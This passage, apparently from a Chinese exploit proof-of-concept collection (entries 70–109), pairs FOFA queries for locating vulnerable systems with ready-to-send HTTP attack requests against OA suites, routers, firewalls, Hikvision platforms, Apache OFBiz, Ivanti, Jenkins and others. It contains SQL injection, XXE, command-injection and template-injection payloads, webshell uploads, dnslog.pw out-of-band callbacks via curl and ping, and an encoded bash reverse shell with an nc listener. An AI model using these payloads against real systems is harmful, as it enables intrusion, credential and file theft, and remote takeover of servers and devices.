Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户 (Wanhu) ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 167021

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远 (Seeyon) OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 33

PAYLOAD

74. 致远 (Seeyon) M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 (Newcapec) campus service management platform (掌上校园服务管理平台) service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 apparel management software UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction project quality supervision system FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀 software DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it implants a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Tosei (Japan) self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒 (DBAppSecurity) 明御 security gateway aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒 (DBAppSecurity) 明御 security gateway aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联 (Seeyon) FE collaborative office platform editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视 (Hikvision) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视 (Hikvision) integrated security management platform (综合安防管理平台) orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视 (Hikvision) operation management center session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神 (Qi An Xin) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. 奇安信网神 (Qi An Xin) SecGate 3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: (replace with your own token)
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
